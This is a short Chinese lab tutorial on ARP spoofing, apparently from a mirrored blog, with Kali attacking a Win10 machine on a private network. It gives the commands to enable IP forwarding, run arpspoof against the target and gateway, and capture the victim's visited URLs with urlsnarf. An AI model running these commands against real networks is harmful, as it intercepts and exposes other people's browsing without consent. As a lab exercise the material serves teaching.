ARP攻击-流量分析

1.实验工具

1.kali作为攻击机

2.win10作为靶机

2.kali数据包转发

出于安全考虑,Linux系统默认是禁止数据包转发的。所谓转发即当主机拥有多于一块的网卡时,其中一块收到数据包,根据数据包的目的ip地址将数据包发往本机另一块网卡,该网卡根据路由表继续发送数据包。这通常是路由器所要实现的功能。我们需要手动开启转发功能。

1.如何开启通信转发?

kali里有个ip_forward 配置文件

1.默认是0 禁止端口转发

2.将其设置成1 开启端口转发

2.开启步骤

1.查看当前是否开启了端口转发

cat /proc/sys/net/ipv4/ip_forward 

2.开启通信转发的命令

echo 1 >> /proc/sys/net/ipv4/ip_forward

3.使用arpspoof发起ARP攻击

arpspoof -i eth0 -r 192.168.110.1 -t 192.168.110.11

4.win10验证是否转发成功

访问:https://www.baidu.com/

3.dsniff工具

1.工具介绍

Dsniff是一个基于unix系统网络嗅探工具,工具集包含两个我们需要的两个工具包,arpspoof 和urlsnarf。

2.安装方法

apt-get install dsniff

3.urlsnarf工具介绍

urlsnarf -h
urlsnarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression]]

-n 表示不反查主机名
-i interface 网卡接口名
-p pattern 表示对过滤的内容使用的正则表达式
-v表示取相反,即是不匹配;expression 是过滤语法,和tcpdump的相同,请参考tcpdump。

4.url流量分析

1.概念

URL流量嗅探操作非常类似于中间人攻击,通过目标主机将路由流量注入到因特网。该过程将通过ARP注入实现攻击。url嗅探能够实时跟踪电脑中的数据流量信息,并且分析出它的类型和去向。从而获得你上网信息。

2.攻击流程

1.开启流量转发

echo 1 >> /proc/sys/net/ipv4/ip_forward

2.开启ARP攻击

arpspoof -i eth0 -r 192.168.110.1 -t 192.168.110.11

3.捕获目标计算机的url

urlsnarf -i eth0

4.靶机上网,访问网站

1.http://www.kangda.cn/#/user/login?redirect=http%3A%2F%2Fwww.kangda.cn%2F%23%2F
2.http://blog.tianya.cn/

5.kali分析用户请求

GitHub 加速计划 / li / linux-dash
10.39 K
1.2 K
下载
A beautiful web dashboard for Linux
最近提交(Master分支:1 个月前 )
186a802e added ecosystem file for PM2 4 年前
5def40a3 Add host customization support for the NodeJS version 4 年前
Logo

旨在为数千万中国开发者提供一个无缝且高效的云端环境,以支持学习、使用和贡献开源项目。

更多推荐